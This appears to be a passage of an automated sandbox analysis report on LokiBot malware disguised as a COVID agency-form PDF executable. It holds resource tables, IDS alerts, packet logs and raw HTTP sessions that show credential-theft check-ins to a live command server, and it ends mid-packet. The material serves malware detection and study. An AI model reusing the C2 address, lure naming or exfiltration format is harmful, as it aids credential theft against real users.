                                        RT_ICON0xe8cc80x16e8dBase IV DBT of \300.DBF, block length 4608, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xea3b00x668data
                                        RT_ICON0xeaa180x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 13107200, next used block 0
                                        RT_ICON0xead000x1e8data
                                        RT_ICON0xeaee80x128GLS_BINARY_LSB_FIRST
                                        RT_ICON0xeb0100x4c28dBase IV DBT, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xefc380x2ca8dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xf28e00xea8data
                                        RT_ICON0xf37880x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0xf40300x6c8data
                                        RT_ICON0xf46f80x568GLS_BINARY_LSB_FIRST
                                        RT_ICON0xf4c600x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                        RT_ICON0x1054880x94a8data
                                        RT_ICON0x10e9300x25a8data
                                        RT_ICON0x110ed80x10a8data
                                        RT_ICON0x111f800x988data
                                        RT_ICON0x1129080x468GLS_BINARY_LSB_FIRST
                                        RT_GROUP_ICON0x112d700x102data
                                        RT_VERSION0x112e740x380data
                                        RT_MANIFEST0x1131f40x8a3XML 1.0 document, UTF-8 Unicode (with BOM) text

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Version Infos

                                        DescriptionData
                                        Translation0x0000 0x04b0
                                        LegalCopyrightCopyright GabSoftware 2009
                                        Assembly Version1.0.1.0
                                        InternalNameInt16ArrayTypeInfo.exe
                                        FileVersion1.0.1.0
                                        CompanyNameGabSoftware
                                        LegalTrademarks
                                        Comments
                                        ProductNameGabCopyPaste
                                        ProductVersion1.0.1.0
                                        FileDescriptionGabCopyPaste
                                        OriginalFilenameInt16ArrayTypeInfo.exe

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        07/01/21-14:36:31.408982TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971580192.168.2.363.141.228.141
                                        07/01/21-14:36:31.408982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.363.141.228.141
                                        07/01/21-14:36:31.408982TCP2025381ET TROJAN LokiBot Checkin4971580192.168.2.363.141.228.141
                                        07/01/21-14:36:31.408982TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971580192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14971780192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971780192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2025381ET TROJAN LokiBot Checkin4971780192.168.2.363.141.228.141
                                        07/01/21-14:36:32.663221TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24971780192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971980192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971980192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2025381ET TROJAN LokiBot Checkin4971980192.168.2.363.141.228.141
                                        07/01/21-14:36:33.952661TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971980192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972080192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972080192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2025381ET TROJAN LokiBot Checkin4972080192.168.2.363.141.228.141
                                        07/01/21-14:36:35.267014TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972080192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14972180192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972180192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.363.141.228.141
                                        07/01/21-14:36:36.486136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972180192.168.2.363.141.228.141

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Jul 1, 2021 14:36:31.244998932 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.401983976 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:31.405318975 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.408982038 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.564255953 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:31.564367056 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:31.721736908 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256418943 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256474972 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256511927 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256548882 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256587029 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256623030 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256623030 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256659985 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256659985 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256689072 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256696939 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.256768942 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.256881952 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.265707016 CEST804971563.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.266645908 CEST4971580192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.501713037 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.657932043 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.658143997 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.663220882 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.819720030 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:32.819875956 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:32.978811979 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568382978 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568468094 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568520069 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568566084 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568645954 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568691969 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568737030 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568780899 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.568964005 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.568994045 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.568996906 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.568999052 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.569153070 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.577445984 CEST804971763.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.577622890 CEST4971780192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.787909031 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.948501110 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:33.950041056 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:33.952661037 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.112454891 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.113523006 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.275362968 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788209915 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788239002 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788250923 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788266897 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788281918 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788295984 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788311005 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788325071 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.788336039 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.788417101 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.788491011 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:34.796504021 CEST804971963.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:34.796613932 CEST4971980192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.105285883 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.263746023 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:35.263948917 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.267014027 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.425731897 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:35.425919056 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:35.587373972 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.150140047 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151612997 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151654005 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151689053 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151710987 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151729107 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151747942 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151770115 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.151772022 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.151823044 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.152213097 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.152244091 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.158884048 CEST804972063.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.159008026 CEST4972080192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.326832056 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.483360052 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.483510017 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.486135960 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.641176939 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:36.641344070 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:36.798700094 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338311911 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338437080 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338485956 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338534117 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338567972 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:37.338577032 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338610888 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:37.338614941 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338654041 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338690996 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.338725090 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:37.338799953 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:37.347299099 CEST804972163.141.228.141192.168.2.3
                                        Jul 1, 2021 14:36:37.347445965 CEST4972180192.168.2.363.141.228.141
                                        Jul 1, 2021 14:36:39.820008993 CEST4972180192.168.2.363.141.228.141

                                        HTTP Request Dependency Graph

                                        • 63.141.228.141

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.34971563.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:31.408982038 CEST1340OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 190
                                        Connection: close
                                        Jul 1, 2021 14:36:31.564367056 CEST1340OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: 'ckav.ruhardz841675DESKTOP-716T771k08F9C4E9C79A3B52B3F739430KPbTq
                                        Jul 1, 2021 14:36:32.256418943 CEST1344INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:31 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 2c 0d 0a 20 20 20 20 20 20 20 20 2e 72 65 61 73 6f 6e 2d 74 65 78 74 20 7b 0d 0a 20 20
                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text {
                                        Jul 1, 2021 14:36:32.256474972 CEST1345INData Raw: 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b
                                        Data Ascii: color: #000000; } .additional-info { background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info a { color: #FFFF
                                        Jul 1, 2021 14:36:32.256511927 CEST1347INData Raw: 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 76 65 72 20 61 64 64 72 65 73 73 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d
                                        Data Ascii: } .info-server address { text-align: left; } footer { text-align: center; margin: 60px 0; } footer a { text-decoration: none; }
                                        Jul 1, 2021 14:36:32.256548882 CEST1348INData Raw: 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 69 67 68 74 3a 20 30 3b 0d 0a 20 20 20
                                        Data Ascii: -align: left; position: absolute; right: 0; bottom: 0; margin: 0 10px; } .status-reason { display: inline; } }
                                        Jul 1, 2021 14:36:32.256587029 CEST1349INData Raw: 31 4d 64 32 30 59 66 69 52 2b 55 46 66 76 64 49 69 7a 70 32 76 31 76 56 6a 74 30 75 73 61 31 70 6d 4e 7a 41 58 32 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67
                                        Data Ascii: 1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP
                                        Jul 1, 2021 14:36:32.256623030 CEST1351INData Raw: 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56 30 30 36 4c 62 53 49 6b 76 42 73 52 6c 7a 42 50 59 6b 49 52 49 48 31 37 34 33 69 45 69 65 6c 42 54 34 69 51 52 6b 4e 48 77 55 51 4d 55 74 54 57 58 71 73 69 51 75 67 42 69 77 6c 37 33 4f 4f 72
                                        Data Ascii: uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIsGnLxpVpVETI4kVM3VCUw1+XdRPRaM0k64jL1LEFkBBGRw7ad1ZE+AVH74Xh8NQM/
                                        Jul 1, 2021 14:36:32.256659985 CEST1352INData Raw: 70 31 36 54 53 43 4f 66 5a 70 70 4d 69 47 44 36 69 56 71 72 32 37 31 6f 56 6f 6b 55 36 41 4a 39 55 35 46 47 6e 58 49 77 77 35 6d 48 2b 6b 4c 45 68 78 49 31 63 6c 32 30 51 43 47 43 54 67 52 4d 41 2f 33 2b 46 32 6c 52 58 58 74 7a 58 68 55 52 50 54
                                        Data Ascii: p16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QNNOw3PdCLgpBUROPQ18mX1ZEx8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81
                                        Jul 1, 2021 14:36:32.256696939 CEST1353INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65
                                        Data Ascii: <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/server_misconfigured.png" class="info-image" />


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        1192.168.2.34971763.141.228.14180C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe
                                        TimestampkBytes transferredDirectionData
                                        Jul 1, 2021 14:36:32.663220882 CEST1365OUTPOST /32.php/fn1ToJTMzu3Td HTTP/1.0
                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                        Host: 63.141.228.141
                                        Accept: */*
                                        Content-Type: application/octet-stream
                                        Content-Encoding: binary
                                        Content-Key: FAC4DD3C
                                        Content-Length: 190
                                        Connection: close
                                        Jul 1, 2021 14:36:32.819875956 CEST1365OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                        Data Ascii: 'ckav.ruhardz841675DESKTOP-716T771+08F9C4E9C79A3B52B3F739430cmtFR
                                        Jul 1, 2021 14:36:33.568382978 CEST1368INHTTP/1.1 404 Not Found
                                        Date: Thu, 01 Jul 2021 12:36:32 GMT
                                        Server: Apache
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 